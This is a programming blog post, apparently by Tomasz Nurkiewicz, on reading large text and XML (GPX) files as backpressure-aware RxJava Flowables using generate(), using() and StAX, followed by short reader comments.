Processing file as a stream turns out to be tremendously effective and convenient. Many people seem to forget that since Java 8 (3+ years!) we can very easily turn any file into a stream of lines: Meet This seems like a lot of work, especially when we already have a stream of lines from JDK 8. Turns out there is a similar factory operator named Let's try to implement parsing and streaming of possibly very large XML file using StAX and RxJava. First we must learn how to use StAX in the first place. The parser is called Feels complex? This is actually the simplest way to read large XML with constant memory usage, irrespective to file size. How does all of this relate to RxJava? At this point we can very easily build a String filePath = "foobar.txt"; try (BufferedReader reader = new BufferedReader(new FileReader(filePath))) { reader.lines() .filter(line -> !line.startsWith("#")) .map(String::toLowerCase) .flatMap(line -> Stream.of(line.split(" "))) .forEach(System.out::println); } reader.lines()returns a Stream<String>which you can further transform. In this example, we discard lines starting with "#"and explode each line by splitting it into words. This way we achieve stream of words as opposed to stream of lines. Working with text files is almost as simple as working with normal Java collections. In RxJava we already learned about generate()operator. It can be used here as well to create robust stream of lines from a file: Flowable<String> file = Flowable.generate( () -> new BufferedReader(new FileReader(filePath)), (reader, emitter) -> { final String line = reader.readLine(); if (line != null) { emitter.onNext(line); } else { emitter.onComplete(); } }, reader -> reader.close() ); generate()operator in aforementioned example is a little bit more complex. The first argument is a state factory. Every time someone subscribes to this stream, a factory is invoked and stateful BufferedReaderis created. Then when downstream operators or subscribers wish to receive some data, second lambda (with two parameters) is invoked. This lambda expression tries to pull exactly one line from a file and either send it downstream ( onNext()) or complete when end of file is encountered. It's fairly straightforward. The third optional argument to generate()is a lambda expression that can do some cleanup with state. It's very convenient in our case as we have to close the file not only when end of file is reached but also when consumers prematurely unsubscribe. Meet This seems like a lot of work, especially when we already have a stream of lines from JDK 8. Turns out there is a similar factory operator named Flowable.using() operator using()that is quite handy. First of all the simplest way of translating Streamfrom Java to Flowableis by converting Streamto an Iterator(checked exception handling ignored): Flowable.fromIterable(new Iterable<String>() { @Override public Iterator<String> iterator() { final BufferedReader reader = new BufferedReader(new FileReader(filePath)); final Stream<String> lines = reader.lines(); return lines.iterator(); } });This can be simplified to: Flowable.<String>fromIterable(() -> { final BufferedReader reader = new BufferedReader(new FileReader(filePath)); final Stream<String> lines = reader.lines(); return lines.iterator(); });But we forgot about closing BufferedReaderthus FileReaderthus file handle. Thus we introduced resource leak. Under such circumstances using()operator works like a charm. In a way it's similar to try-with-resourcesstatement. You can create a stream based on some external resource. The lifecycle of this resource (creation and disposal) will be managed for you when someone subscribes or unsubscribes: Flowable.using( () -> new BufferedReader(new FileReader(filePath)), reader -> Flowable.fromIterable(() -> reader.lines().iterator()), reader -> reader.close() );It's fairly similar to last generate()example, however the most important lambda expression in the middle is quite different. We get a resource ( reader) as an argument and are suppose to return a Flowable(not a single element). This lambda is called only once, not every time downstream requests new item. What using()operator gives us is managing BufferedReaders's lifecycle. using()is useful when we have a piece of state (just like with generate()) that is capable of producing whole Flowableat once, as opposed to one item at a time. Streaming XML files...or JSON for that matter. Imagine you have a very large XML file that consists of the following entries, hundreds of thousands of them: <trkpt lat="52.23453" lon="21.01685"> <ele>116</ele> </trkpt> <trkpt lat="52.23405" lon="21.01711"> <ele>116</ele> </trkpt> <trkpt lat="52.23397" lon="21.0166"> <ele>116</ele> </trkpt>This is a snippet from standard GPS Exchange Format that can describe geographical routes of arbitrary length. Each <trkpt>is a single point with latitude, longitude and elevation. We would like to have a stream of track points (ignoring elevation for simplicity) so that the file can be consumed partially, as opposed to loading everything at once. We have three choices: - DOM/JAXB - everything must be loaded into memory and mapped to Java objects. Won't work for infinitely long files (or even very large ones) - SAX - a push-based library that invokes callbacks whenever it discovers XML tag opening or closing. Seems a bit better but can't possibly support backpressure - it's the library that decides when to invoke callbacks and there is no way of slowing it down - StAX - like SAX, but we must actively pull for data from XML file. This is essential to support backpressure - we decide when to read next chunk of data XMLStreamReaderand is created with the following sequence of spells and curses: XMLStreamReader staxReader(String name) throws XMLStreamException { final InputStream inputStream = new BufferedInputStream(new FileInputStream(name)); return XMLInputFactory.newInstance().createXMLStreamReader(inputStream); }Just close your eyes and make sure you always have a place to copy-paste the snippet above from. It gets even worse. In order to read the first <trkpt>tag including its attributes we must write quite some complex code: import lombok.Value; @Value class Trackpoint { private final BigDecimal lat; private final BigDecimal lon; } Trackpoint nextTrackpoint(XMLStreamReader r) { while (r.hasNext()) { int event = r.next(); switch (event) { case XMLStreamConstants.START_ELEMENT: if (r.getLocalName().equals("trkpt")) { return parseTrackpoint(r); } break; case XMLStreamConstants.END_ELEMENT: if (r.getLocalName().equals("gpx")) { return null; } break; } } return null; } Trackpoint parseTrackpoint(XMLStreamReader r) { return new Trackpoint( new BigDecimal(r.getAttributeValue("", "lat")), new BigDecimal(r.getAttributeValue("", "lon")) ); }The API is quote low-level and almost adorably antique. Everything happens in a gigantic loop that reads... something of type int. This intcan be START_ELEMENT, END_ELEMENTor few other things which we are not interested in. Remember we are reading XML file, but not line-by-line or char-by-char but by logical XML tokens (tags). So, if we discover opening of <trkpt>element we parse it, otherwise we continue. The second important condition is when we find closing </gpx>which should be the last thing in GPX file. We return nullin such case, signaling end-of-XML-file. Feels complex? This is actually the simplest way to read large XML with constant memory usage, irrespective to file size. How does all of this relate to RxJava? At this point we can very easily build a Flowable<Trackpoint>. Yes, Flowable, not Observable(see: Obsevablevs. Observable). Such a stream will have full support for backpressure, meaning it will read file at appropriate speed: Flowable<Trackpoint> trackpoints = generate( () -> staxReader("track.gpx"), this::pushNextTrackpoint, XMLStreamReader::close); void pushNextTrackpoint(XMLStreamReader reader, Emitter<Trackpoint> emitter) { final Trackpoint trkpt = nextTrackpoint(reader); if (trkpt != null) { emitter.onNext(trkpt); } else { emitter.onComplete(); } }Wow, so simple, such backpressure![1] We first create an XMLStreamReaderand make sure it's being closed when file ends or someone unsubscribes. Remember that each subscriber will open and start parsing the same file over and over again. The lambda expression in the middle simply takes the state variables ( XMLStreamReader) and emits one more trackpoint. All of this seems quite obscure and it is! But we now have a backpresure-aware stream taken from a possibly very large file using very little resources. We can process trackpoint concurrently or combine them with other sources of data. In the next article we will learn how to load JSON in very similar way. Nice post - thanks for sharing. Tomasz, thank you for writing these articles, they're very helpful, clear and useful in a world where good RxJava documentation is scarce. Please keep writing them. Thank you, three more articles are ready and waiting to be published :-). Hello, Is there any github repo we can download to check this out?? Great article Thanks! Source code is only available in this article, but snippets should be almost self-sufficient.
https://www.nurkiewicz.com/2017/08/loading-files-with-backpressure-rxjava.html
CC-MAIN-2018-34
refinedweb
1,421
58.99
Hello there! I just posted to the Share board, explaining my concept of a "discord bot that isn't a bot". Essentially, it's a website which exploits the way discord shows a sort-of preview of some websites when a link to them is posted. The website I made is blank when viewed in a browser, but when a link is posted in discord, it can display whatever content I want, responding to any text after the base URL. For example, if you posted, a box would appear underneath showing 4. The best thing about this is that it can be used by anyone on any server, without inviting any bot. Here's a tutorial on how to make your own. We're going to be doing this in a Python3 repl, using flask to create a server and website, and WolframAlpha to make an advanced scientific calculator. Firstly, we're going to create our flask server. import flask app=flask.Flask("") app.run("0.0.0.0",8080) This code is fairly self-explanatory. When you run it, a new window will appear in the top-right corner, with a 404 Not Found error. This is because we haven't yet defined our homepage. After line 2, add the following code: @app.route("/) def home(): return "<h1>Hello World!</h1>" If you run your code now, a large "Hello World" will display in that top-right panel. However, our finished website will not display any content at all. A key part of this project is OGP, Open Graph Protocol. This is a protocol allowing websites to be displayed as the boxes discord shows, and is also in use on many other sites, like Facebook. Create a folder called templates. Inside it, make a file called index.html, with the following code: <!DOCTYPE HTML> <html prefix="og:"> <head> <meta property="og:title" content=""> <meta property="og:type" content=""> <meta property="og:url" content=""> <meta property="og:image" content=""> </head> </html> The four meta tags in head are required properties for any page using OGP. However, since this isn't a normal website preview, we're not going to use any of these four. Underneath them, add <meta property="og:description" content="{{output}}">. The og:description property is the text we're going to be seeing, and {{output}} tells flask that this is a variable we're going to assign a value to. Back in main.py, change return "Hello World!" to return flask.render_template("index.html",output="Hello World!") and run the code. The top-right panel should now be a blank page. In discord (or any other platform that uses OGP) send a message containing the URL of your server. You should see a box containing the words "Hello World!". flask.render_template is a function that allows us to take a file from the templates folder, and render the HTML with variables inside, and we then assign the variable output. The next step it to create a WolframAlpha app and get an appid. First, you need to create an account here. When you're signed in, open the dropdown menu in the top-right corner and click My Apps (API). Click "Get an AppID". Enter the name of your app and a description, and click Get AppID. You will then be shown your AppID. In your repl, make a file called .env and put appid=YOUR_APPID. Naming the file .env means that nobody else can see your AppID (the app in the photo below has been deactivated). In main.py, add import os and import wolframalpha at the top. Next, after app=flask.Flask(""), add client=wolframalpha.Client(os.getenv("appid")). os.getenv("appid") is how we retrieve the AppID which we stored in .env. Underneath the index() function, add the following code: @app.route("/<path:calculation") def calculate(calculation): result=client.query(calculation) result=next(result.results).text return render_template("index.html",output=result) The first line of that tells flask that we're creating a new route, which in this case is /<anything>. In <path:calculation>, the <> mean that we're passing on a variable called calculation, and path tells flask that calculation is a path rather than a string, meaning it can include /. We need this for division. If we just had <calculation>, this function would not be called for /9/3 for example. Lines 3 and 4 are the code for WolframAlpha. result ends up storing the result of our calculation, as a string. Line 5 returns the template index.html with the variable output assigned. You can now run this code and test it in discord by going to https://<replname>.<username>.repl.co/1+2, and after a second or two, a box should appear saying 3. You can also change "Hello World" in the index() function to `"/[calculation]\nCalculates a mathematical expression" to tell people how to use your bot. When you're creating your own bot, there is one major problem you might run into. If one of your functions doesn't require any variables, for example a timchen() function activated when you link to /timchen that gives you a random picture of timchen, you may find yourself a victim of discord caching. This means that if you post the same link, discord simply uses the previous preview and doesn't bother to check for a new one. Getting round this is easy: simply add a query (for example, ?discordcachingisannoying) at the end of the URL each time. As long as the query is different every time, discord won't recognise it as the same URL and will re-request the preview. I hope you enjoyed this tutorial and found it useful! If you did, please upvote, and I'll send you some vee freebucks! Oh and one final thing... this bot-but-not-a-bot works on Whatsapp!! Work pretty much everywhere except twitter. Use Twitter meta tags and works even there too. @TheDrone7 I know OGP is uses on a lot of sites. I just thought whatsapp was a good one to mention since basically everyone uses it
https://repl.it/talk/learn/How-to-Make-a-Discord-Bot-That-Isnt-a-Bot/17015
CC-MAIN-2019-51
refinedweb
1,020
67.45
09 November 2006 18:01 [Source: ICIS news] ?xml:namespace> ?xml:namespace> This was been followed by a 40,000 tonnes/year closure of PS capacity by Total in Gonfreville and the largest closure, that of Nova Innovene’s 180,000 tonnes/year plant in the UK, finally shut down at the end of last month. The latest announcement of a closure was from BASF who said that their 70,000 tonnes/year high impact (HIPS) line in Some observers had estimated the oversupply in the European PS market at something approaching 600,000 tonnes/year. “While these closures do not bring the market back into balance, they go a long way to help, and instead of running at 75-80% of capacity, the industry can now produce at 90%,” a major PS producer commented on Thursday. Margins in the PS market have been very poor, and PS producers have taken extreme measures to stop the rot. PS prices remained flat in November, however, with even some downward pressure after slight erosion in November styrene. Net spot PS prices were reported at €1,250/tonne free delivered (FD) Northwest Europe (N
http://www.icis.com/Articles/2006/11/09/1104873/europe-ps-output-cut-by-350000-tyr-since-2005.html
CC-MAIN-2014-52
refinedweb
191
54.46
12 October 2011 14:48 [Source: ICIS news] LONDON (ICIS)--The European October monoethylene glycol (MEG) contract price is now fully confirmed at €1,136/tonne ($1,556/tonne), up €31/tonne from September, a producer and a customer said on Wednesday. “I have agreed … that they will invoice our contract MEG for October at an ECP (European contract price) of €1,136/tonne FD (free delivered) NWE (northwest ?xml:namespace> The confirmation follows an initial agreement settled on 7 October. Producers have been targeting a higher figure and are focused on firm fundamentals in “Globally, the MEG market is balanced-to-short. We should be looking for global pricing,” the producer said. The state of demand is a concern for customers who have avoided buying large spot quantites for fear of being caught with high-priced stock. Additional reporting by Mark Victory ($1 = €0.73)
http://www.icis.com/Articles/2011/10/12/9499548/europe-october-meg-contract-confirmed-at-1136tonne-up-31tonne.html
CC-MAIN-2015-06
refinedweb
146
52.29
In my previous article Before we start with development lets get familiar with classes we will be using.We will be using some classes from System.Reflection namespace and many classes from EnvDte namespace. Lets start with EnvDTE namespace Object model in EnvDTE namespace is called as Visual Studio .net Automation Object Model. DTE stands for Development Tools Extensibility. DTE Object :EnvD :D Object model at this level looks simple and easy to understand. From now onwards it starts getting complicated. FileCodeModel :Each like Develop Sample to read object model in a project Now that we are aware of various objects, lets start with developing a small sample.We are building on top of code from the previous article. In previous article we studied Solution object, ProjectItems collection, ProjectItem object. Lets add a tree view control to UI For each project item selected we will add Namespaces, Classes and Interfaces in the same. Add following code in lstProjectItems_SelectedIndexChanged event to WizardSampleUI.cs file. private /// Now add following code to WizardSampleUI.cs file. Also check the FileCodeModel property used on prjToLoad. We are using CodeElements collection on this object. Inside the first for loop we are checking the type of code element. The type of any code element is checked using Kind property. This property is of type Enum vsCMElementClass. The Kind property of the code element is compared with this Enum. We are checking if the code element is a NameSpace declaration. Unfortunately I could not find any element that will represent Using statements though the Enum - vsCMElementClass supports it. Lets move ahead. Once we confirm that the code element is a NameSpace we type cast it to CodeNamespace type and use its Member property to access all the classes and interfaces declared in Namespace. The Member property returns collection of all CodeElements. While looping thro the namespace members, we check the Kind of each code element and populate tree view with details of the code element using helper functions. These helper functions are similar to loadProjectItemdata function. Different helper functions are used to populate data about Class, functions in class and properties in the class. We have Tag property of TreeNode to our benefit. This property can hold any object. We want to add functionality that enables user to select the function/ class/ interface and open it in the code view pane. User will select the node and double click on it. So while adding any treenode object we are initializing the Tag property of the treenode to the code element it represents In loadProjectItemdata function we have added code TreeNode ndNameSpace = nsNodes.Nodes.Add(cdElement.FullName);ndNameSpace.Tag = cdElement; //Tag will later used to navigate to project item.navigate to project item. Now lets add the double click event for tree view as follows: When user double clicks on any function, parameter or class in the tree view. dte.ExecuteCommand This is very important and powerful method of DTE object. This method expects a command which is a menu operated command. E.g. to build the solution we go to Build menu and select Build Solution command. To execute the same command using dte.ExecuteCommand you will provide string parameter Build.BuildSolution. To get the list of all these commands, you can use command window.e.g. In command window you can start typing Edit and you will get context sensitive help of all the commands available for Edit menu. In the same way you can find all the commands for main menus such as Build, Debug, Tools etc. The other parameter for dte.ExecuteCommand is string of argument. This is optional and specific to each command. What we achieved ? We studied various objects of VS.Net automation object model.We studied different properties and methods of these objects.Using these objects we browsed through the code modules and projects. We created an explorer that is similar to Class View explorer.We were introduced to TextPoint object. This is an important object to navigate thro the text window and to manipulate the code. The next step would be to generate code. Extending Your Working Environment in Visual Studio - Advanced Building Data Access Helper Component for Microsoft SQL Server Very, very good article ! Trés, trés bon article qui m'a été trés utile (sorry i'am French) Best Regards Hi, very nice article. How to get the list of controls in windows form and ASP.Net web page using Add-in in VS2008? Nice Effort. It helps, but could you please tell me how could I search for all available commands using command line, I'm not getting it in right way, please help me out of it.Thanks anyway.Usman Afzal
http://www.c-sharpcorner.com/uploadfile/raviraj.bhalerao/extendingworkenv211292005000156am/extendingworkenv2.aspx
crawl-003
refinedweb
783
58.99
Much of the scientific and visualization software in the world today is designed to be constructed from two separate parts: a visual frontend and a solver backend. The solver backend specializes in solving a problem within a specific domain, and can be difficult to interact with, whereas the visual frontend replaces API interaction with quick-feedback graphical interaction that most end-users can use with ease. When we look around, we can find solver and visual editor designs in almost all software. A database application, for example, makes use of SQL statements to interact with database backends, while the user interface presents the data in a more human-readable form. Scene graph systems can be thought of as solver backends for 3D visualization and modeling systems. Objects from the scene graph can be represented in several ways in the frontend for the user to work and interact with. In principle the solver/visual editor paradigm is very similar to the model/view paradigm found in Qt. A model is a software object that can be interacted with using the API it exposes. Views are used to display model objects, and they help users to visually interact with the model. In this article, we will look at how we can make use of Qt to design efficient visual editors for solver backends. Solver systems exist for different problem domains. Let's take the 3D visualization domain, for example. VTK () is a solver system for visualization problems. With VTK, one can give visual meaning to several kinds of data. Similarly, there are solver systems for several other problem domains. QualNet () is a solver for problems in the network simulation world. Using QualNet, one can simulate complex networks. Most solver systems provide classes or simple C APIs to help construct problem scenarios, solve those scenarios, and to fetch the solution arrived at by the solver afterwards. A programmer can effectively make use of one or more classes in each of these categories to solve a problem and study the solution. As the solver system matures, it may become necessary to ensure that even non-programmers can make use of the solver. Sometimes even the programmers developing the solver system may require easy-to-use interfaces for working with it. This is where visual editors come in. Visual editors for solver backends provide a graphical way to perform the following tasks: While the visual editors used are typically specific to each solver system, we can identify some design patterns that can help when designing most solver systems. This article specifically deals with how we can effectively use Qt to implement problem objects, a problem canvas, property editors and output viewers—all key parts of a solver system's design. Problem objects in a solver system describe aspects of a problem. They may expose one or more configurable properties and events. A programmer would use the getter and setter functions associated with properties, and callbacks associated with events, to configure the object. In a visual editor, configurable properties are shown in a property editor, and events are either handled internally or exposed as scriptable routines in the frontend. Let's consider a real world example to understand problem objects better. Suppose we wanted to visualize a 3D cone in VTK. To do this, we would have to assemble a pipeline as shown in the diagram on the left. vtkConeSource, vtkPolyDataNormals, vtkPolyDataMapper, vtkActor, vtkRenderer and vtkRenderWindow are problem objects. They are connected to form a visualization pipeline which, when executed, produces the output as shown in the left-hand image below. vtkConeSource has some properties like Height, Resolution and BaseRadius which can be adjusted programmatically using the appropriate getter and setter functions to alter the output. For example, if we set the Resolution property to 6 in the above pipeline, we get output as shown in the right-hand image below. In a visual editor, we would want problem objects to be graphically configurable. To enable this, we would have to create some mechanisms to transparently query property names and change their values. Most solver systems may not provide mechanisms to let us query or change their problem objects, therefore we can either modify the solver system or wrap problem objects in another layer that provides such mechanisms. Modifying the solver system may not be a practical solution in most cases because that may involve re-engineering the solver backend or, worse still, we may not have access to the source code of the solver. Wrapping, on the other hand, is a more practical approach. Wrapping involves providing access to backend methods and objects via another layer. This layer could be a wrapper class. A wrapper class essentially manages another object. It provides means for accessing the methods on that class, and also ensures the "health" of the class at all times. The object that is wrapped is called a wrapped object, and its class is called a wrapped class. Here's a simple Qt 3-based wrapper class for vtkConeSource: #include "vtkConeSource.h" class ConeSourceWrapper {(float x, float y, float z) { _vtkConeSource->SetCenter(x, y, z); } void getCenter(float &x, float &y, float &z) const { float v[3]; _vtkConeSource->GetCenter(v); x = v[0]; y = v[1]; z = v[2]; } /* Other properties ... */ protected: vtkConeSource* _vtkConeSource; }; ConeSourceWrapper does two things: It manages the lifetime of the objects— each vtkConeSource object is constructed and destroyed along with its corresponding ConeSourceWrapper object—and it provides wrapper methods that are used to access methods within vtkConeSource. Now, you might wonder why writing such classes can be of any use, since all we have done so far is duplicate the getter and setter functions of vtkConeSource in the wrapper class. Let's take a look at a slightly modified version: class ConeSourceWrapper : public QObject { Q_OBJECT Q_PROPERTY(double Height READ getHeight WRITE setHeight) Q_PROPERTY(QValueList Center READ getCenter WRITE setCenter)(const QValueList <QVariant> & val) { _vtkConeSource->SetCenter(val[0].toDouble(), val[1].toDouble(), val[2].toDouble()); } const QValueList <QVariant> getCenter() const { QValueList <QVariant> ret; float v[3]; _vtkConeSource->GetCenter(v); ret.append( QVariant(v[0]) ); ret.append( QVariant(v[1]) ); ret.append( QVariant(v[2]) ); return ret; } /* Other properties ... */ protected: vtkConeSource* _vtkConeSource; }; The following things have been changed in the second version of the wrapper class: QMetaObject also provides mechanisms for querying the signals and slots exposed by Qt objects. In a visual editor environment events are represented by signals and commands are represented by slots. By using Qt's meta-object system one can easily support events and commands. However, a complete description of this is beyond the scope of this article. Problem objects are not just containers for properties, signals and slots. They may have custom behavioral patterns that need to be regularized, so that those patterns can be accessed transparently for all problem objects. For example, objects that take part in a VTK pipeline accept one or more inputs and produce one or more outputs. Each input and output path has a specific data type. The output of one object can be used as the input to another object. Wrapper classes for VTK will therefore have to expose these connection paths and the methods that perform connections via a common interface. To ensure that all wrappers employ common mechanisms to make and break such connections, we will need to ensure that all wrappers are derived from a single class that provides virtual functions to perform these tasks. Here is the code for one such wrapper class: class CWrapper : public QObject { Q_OBJECT Q_PROPERTY (QString Name READ name WRITE setName) public: static bool link(CWrapper *output, int outLine, CWrapper *input, int inLine, QString *errorMsg=0); static bool unlink(CWrapper *output, int outLine, CWrapper *input, int inLine, QString *errorMsg=0); ... virtual int inputLinkCount() const; virtual CWrapperLinkDesc inputLinkDesc(int index) const; virtual int outputLinkCount() const; virtual CWrapperLinkDesc outputLinkDesc(int index) const; ... public slots: void setName(const QString name); void removeInputLinks(); void removeOutputLinks(); void removeAllLinks(); protected: virtual bool hasInput(int index); virtual bool setInput(int index, const CWrapperLinkData &linkData); virtual bool removeInput(int index, const CWrapperLinkData &linkData); virtual bool getOutput(int index, CWrapperLinkData &output); virtual void setVtkObject(vtkObject* object); ... void addLink(CWrapperLink *link); void removeLink(CWrapperLink *link); ... }; From the above code you can see that, if we make CWrapper the base class for all wrappers in the visual editor for creating and editing VTK pipelines, we can do the following for each subclass: The link() and unlink() functions make use of these reimplementations to establish and break links between wrappers. Since CWrapper is a subclass of QObject, subclasses of CWrapper can provide transparent access to properties, too. A problem canvas can be thought of as a surface on which problem objects can be placed, configured and connected together to create a problem scenario. A problem canvas should ideally have these properties: The Graphics View framework in Qt 4.2 provides an excellent framework with which to design such modules, enabling us to manage and interact with a large number of custom-made 2D graphical items, and it supports features such as zooming and rotation that can help to visualize the items on a problem canvas. In the previous section we saw that by creating a framework class called CWrapper as a subclass of QObject we were able to provide transparent access to properties and connections. Here, we will modify the architecture of CWrapper a bit to make it more usable within the problem canvas. To provide the functionality of a problem canvas, CWrapperCanvas, the most ideal class to derive from would be QGraphicsScene. If we derived CWrapper from QGraphicsRectItem, we could place instances of CWrapper on the problem canvas. To represent connections, we would have to create a new class called CWrapperLink, which would be a subclass of QGraphicsLineItem. The graphics scene, CWrapperCanvas could then be shown in a QGraphicsView subclass. With the above framework in place, all we will need to do is to create subclasses of CWrapper for each and every VTK class we need to support in the frontend. For the VTK pipeline explained in the previous section, we will need to create six wrappers. A property editor is a user interface component in the front end that helps users configure values of properties exposed by problem object wrappers. We would expect the following features from a property editor: The Qt Solutions kit comes with a robust "Property Browser" framework that can be used (almost off the shelf) as a property editor. If you do not have access to Qt Solutions, then you can subclass from QTreeWidget or QListWidget to create a simple property editor. A property editor typically shows all editable properties exposed by any QObject subclass and allows the user to edit them. Optionally, it may also list signals emitted by the QObject and provide a user interface to associate scripts with them. With Qt 4.3 you can make use of the QtScript module to associate JavaScript code with events. An output viewer is a user interface component that shows the output of a process or the solution given by the solver. Some solvers have implicit output viewers; for example, VTK has a vtkRenderWindow that shows the visualized output. For solvers that do not have their own output viewers, we will have to implement custom output viewing mechanisms. Output viewers are mostly specific to the solver, hence a complete description of them is beyond the scope of this article. In this article, we have seen how easy it is to construct the building blocks for a framework that we can use to visualize problems and their solutions. Qt provides many of the user interface features to make this possible and, via its meta-object system, allows us to do this in an extensible way. Accompanying this article is the full source code for a complete working demo of a simple VTK pipeline editor. The code for the demo illustrates how the above principles can be used to create a visual editor for VTK. (The libraries you need can be obtained from.)
http://doc.trolltech.com/qq/qq22-visualeditors.html
crawl-001
refinedweb
2,003
51.48
Data Visualization is a big part of data analysis and data science. In a nutshell data visualization is a way to show complex data in a form that is graphical and easy to understand. This can be especially useful when trying to explore the data and get acquainted with it. Visuals such as plots and graphs can be very effective in clearly explaining data to various audiences. Here is a beginners guide to data visualisation using Matplotlib from a Pandas dataframe. Fundamental design principals All great visuals follow three key principles: less is more, attract attention, and have impact. In other words, any feature or design you include in your plot to make it more attractive or pleasing should support the message that the plot is meant to get across and not distract from it. Matplotlib and its architecture Let's learn first about Matplotlib and its architecture. Matplotlib is one of the most widely used, if not the most popular data visualization libraries in Python. Matplotlib tries to make basic things easy and hard things possible. You can generate plots, histograms, box plots, bar charts, line plots, scatterplots, etc., with just a few lines of code. Keep reading to see code examples. Matplotlib's architecture is composed of three main layers: the back-end layer, the artist layer where much of the heavy lifting happens, and the scripting layer. The scripting layer is considered a lighter interface to simplify common tasks and for quick and easy generation of graphics and plots. Import Matplotlib and Numpy. First import Matplotlib and Matplotlib's pyplot. Note that you need to have Numpy installed for Matplotlib to work. If you work in Jupiter Notebooks you will need to write %matplotlib inline for your matplotlib graphs to be included in your notebook, next to the code. import pandas as pd import numpy as np %matplotlib inline import numpy as np import matplotlib as mpl import matplotlib.pyplot as plt mpl.style.use('ggplot') The Pandas Plot Function Pandas has a built in .plot() function as part of the DataFrame class. In order to use it comfortably you will need to know several key parameters: kind — Type of plot that you require. ‘bar’,’barh’,’pie’,’scatter’,’kde’ etc . color — Sets color. It accepts an array of hex codes corresponding to each data series / column. linestyle — Allows to select line style. ‘solid’, ‘dotted’, ‘dashed’ (applies to line graphs only) x — label or position, default: None. y — label, position or list of label, positions, default None. Allows plotting of one column against another. legend— a boolean value to display or hide the legend title — The string title of the plot These are fairly straightforward to use and we’ll do some examples using .plot() later in the post. Line plots in Pandas with Matplotlib A line plot is a type of plot which displays information as a series of data points called 'markers' connected by straight line segments. It is a basic type of chart common in many fields. Use line plots when you have continuous data sets. These are best suited for trend-based visualizations of data over a period of time. # Sample data for examples # Manually creating a dataframe # Source: df = pd.DataFrame({ 'Year':['1958','1963','1968','1973','1978','1983','1988', '1993', '1998', '2003', '2008', '2013', '2018'], 'Average population':[51652500, 53624900, 55213500, 56223000, 56178000, 56315000, 56916000, 57713000, 58474000, 59636000, 61823000, 64105000, 66436000] }) The df.plot() or df.plot(kind = 'line') commands create a line graph, and the parameters passed in tell the function what data to use. While you don't need to pass in parameter kind = 'line' in the command to get a line plot it is better to add it for the sake of clarity. The first parameter, year, will be plotted on the x-axis, and the second parameter, average population, will be plotted on the y-axis. df.plot(x = 'Year', y = 'Average population', kind='line') If you want to have a title and labels for your graph you will need to specify them separately. plt.title('text') plt.ylabel('text') plt.xlabel('text') Calling plt.show() is required for your graph to be printed on screen. If you use Jupiter Notebooks and you already run line %matplotlib inline your graph will show even without you running plt.show() but, it will print an unwanted text message as well. This is why it is better to run plt.show() regardless of the environment. When run, the output will be as follows: Bar charts in Pandas with Matplotlib A bar plot is a way of representing data where the length of the bars represents the magnitude/size of the feature/variable. Bar graphs usually represent numerical and categorical variables grouped in intervals. Bar plots are most effective when you are trying to visualize categorical data that has few categories. If we have too many categories then the bars will be very cluttered in the figure and hard to understand. They’re nice for categorical data because you can easily see the difference between the categories based on the size of the bar. Now lets create a dataframe for our']) To create a bar plot we will use df.plot() again. This time we can pass one of two arguments via kind parameter in plot(): kind=barcreates a vertical bar plot kind=barhcreates a horizontal bar plot Simmilarly df.plot() command for bar chart will require three parameters: x values, y values and type of plot. df.plot(x ='Country', y='GDP_Per_Capita', kind = 'bar') plt.title('GDP Per Capita in international dollars') plt.ylabel('GDP Per Capita') plt.xlabel('Country') plt.show() Sometimes it is more practical to represent the data horizontally, especially if you need more room for labelling the bars. In horizontal bar graphs, the y-axis is used for labelling, and the length of bars on the x-axis corresponds to the magnitude of the variable being measured. As you will see, there is more room on the y-axis to label categetorical variables. To get a horizontal bar chart you will need to change a kind parameter in plot() to barh. You will also need to enter correct x and y labels as they are now switched compare to the standart bar chart. df.plot(x ='Country', y='GDP_Per_Capita', kind = 'barh') plt.title('GDP Per Capita in international dollars') plt.ylabel(' Country') plt.xlabel('GDP Per Capita') plt.show() The df.plot() command allows for significant customisation. If you want to change the color of your graph you can pass in the color parameter in your plot() command. You can also remove the legend by passing legend = False and adding a title using title = 'Your Title'. df.plot(x = 'Country', y = 'GDP_Per_Capita', kind = 'barh', color = 'blue', title = 'GDP Per Capita in international dollars', legend = False) plt.show() Scatter plots in Pandas with Matplotlib Scatterplots are a great way to visualize a relationship between two variables without the potential for getting a misleading trend line from a line graph. Just like with the above graphs, creating a scatterplot in Pandas with Matplotlib only requires a few lines of code, as shown below. Let's start by creating a dataframe for the scatter plot. # Sample dataframe # Source: # # Data for the 2015 Data = {'Country': ['United States','Singapore','Germany', 'United Kingdom','Japan'], 'GDP_Per_Capita': [52591,67110,46426,38749,36030], 'Life_Expectancy': [79.24, 82.84, 80.84, 81.40, 83.62] } df = pd.DataFrame(Data,columns=['Country','GDP_Per_Capita','Life_Expectancy']) Now that you understand how the df.plot() command works, creating scatterplots is really easy. All you need to do is change the kind parameter to scatter. df.plot(kind='scatter',x='GDP_Per_Capita',y='Life_Expectancy',color='red') plt.title('GDP Per Capita and Life Expectancy') plt.ylabel('Life Expectancy') plt.xlabel('GDP Per Capita') plt.show() Pie charts in Pandas with Matplotlib A pie chart is a circular graphic that displays numeric proportions by dividing a circle into proportional slices. You are most likely already familiar with pie charts as they are widely used. Let's use a pie chart to explore the proportion (percentage) of the population split by continents. # sample dataframe for pie chart # source: # df = pd.DataFrame({'population': [422535000, 38304000 , 579024000, 738849000, 4581757408, 1106, 1216130000]}, index=['South America', 'Oceania', 'North America', 'Europe', 'Asia', 'Antarctica', 'Africa']) We can create pie charts in Matplotlib by passing in the kind=pie keyword in df.plot() . df.plot(kind = 'pie', y='population', figsize=(10, 10)) plt.title('Population by Continent') plt.show() Box plots in Pandas with Matplotlib A box plot is a way of statistically representing the distribution of the data through five main dimensions: - Minimun: The smallest number in the dataset. - First quartile: The middle number between the minimum and the median. - Second quartile (Median): The middle number of the (sorted) dataset. - Third quartile: The middle number between median and maximum. - Maximum: The highest number in the dataset. For the box plot, we can use the same dataframe that we used earlier for the']) To make a box plot, we can use the kind=box parameter in the plot() method invoked in a pandas series or dataframe. df.plot(kind='box', figsize=(8, 6)) plt.title('Box plot of GDP Per Capita') plt.ylabel('GDP Per Capita in dollars') plt.show() Conclusion We just learned 5 quick and easy data visualisations using Pandas with Matplotlib. I hope you enjoyed this post and learned something new and useful. If you want to learn more about data visualisations using Pandas with Matplotlib check out Pandas.DataFrame.plot documentation.
https://re-thought.com/how-to-visualise-data-with-python/
CC-MAIN-2021-31
refinedweb
1,591
57.27
